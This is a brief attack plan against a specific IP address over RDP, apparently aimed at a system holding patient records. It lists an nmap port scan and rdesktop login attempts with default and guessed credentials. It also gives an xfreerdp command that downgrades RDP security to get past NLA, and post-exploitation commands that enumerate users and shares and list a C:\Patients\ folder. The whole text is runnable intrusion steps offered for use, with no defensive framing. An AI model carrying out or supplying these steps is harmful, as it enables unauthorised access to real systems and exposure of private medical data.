ATTACK PLAN for 178.175.128.102 (RDP): 1. SCAN: nmap -p3389,445,139,135 178.175.128.102 2. RDP ATTACK: rdesktop -u Service -p Service 178.175.128.102 rdesktop -u admin -p admin 178.175.128.102 rdesktop -u KBCadmin -p KBC2023! 178.175.128.102 3. If NLA error: xfreerdp /u:admin /v:178.175.128.102 /sec:rdp 4. POST-EXPLOIT: whoami net users dir C:\Patients\ net share